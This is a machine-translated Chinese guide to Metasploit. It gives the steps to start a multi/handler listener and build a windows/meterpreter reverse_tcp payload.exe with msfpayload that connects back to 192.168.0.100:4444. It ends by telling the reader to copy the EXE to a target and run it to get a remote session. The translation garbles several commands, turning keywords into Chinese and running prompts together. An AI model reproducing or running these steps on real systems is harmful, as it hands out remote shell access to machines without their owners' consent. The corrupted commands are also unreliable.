在没有漏洞的情况下本地使用Meterpreter

Metasploit职业

创建一个新项目,单击Campaigns,创建一个新的Campaign,启用USB Campaign并配置侦听端口。此时,保存活动,启动它,然后从提供的链接下载可执行文件。会话现在将出现在Sessions选项卡中。

或者,从管理菜单访问全局设置,并通过此接口配置一个新的持久侦听器,选择您希望此侦听器支持的有效负载类型(reverse_tcp, reverse_https等)。一旦设置了侦听器,请参阅下面的Metasploit框架创建可执行文件的步骤。

Metasploit社区和Metasploit框架下面列出的步骤也可以在不利用Metasploit Pro中的Campaign特性的情况下使用。

Metasploit框架

打开Metasploit控制台,首先在Windows上从开始菜单启动控制台,或者在Linux上使用“msfpro”或“msfconsole”链接。一旦控制台打开,输入以下命令:

MSF >使用exploit/multi/handler>设置有效负载窗口/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.0.100msf漏洞(处理程序)>设置LPORT 4444msf exploit(handler) > set ExitOnSession falseMSF利用(处理程序)>利用-j

这将在后台运行处理程序侦听器。将192.168.0.100更改为您的机器的IP,但不要将其设置为127.0.0.1(这在Metasploit中是特殊大小写)。一旦侦听器运行,就到了生成实际有效负载的时间了。

打开一个可以访问Metasploit环境的命令shell。在Windows上,这是一个到系统控制台的链接,在Linux上是/opt/metasploit-4.1.2/diagnostic_shell。如果msfconsole已经在Linux用户的路径中,那么Linux用户可能根本不需要这样做。

在shell中,执行以下命令:

窗户C:\metasploit > ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4444 X > payload.exe

Linux$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4444 X > payload.exe

复制此EXE到您的目标并执行它。会话将通过Metasploit控制台可见(如果您使用商业或社区产品创建侦听器,则在Sessions选项卡中可见)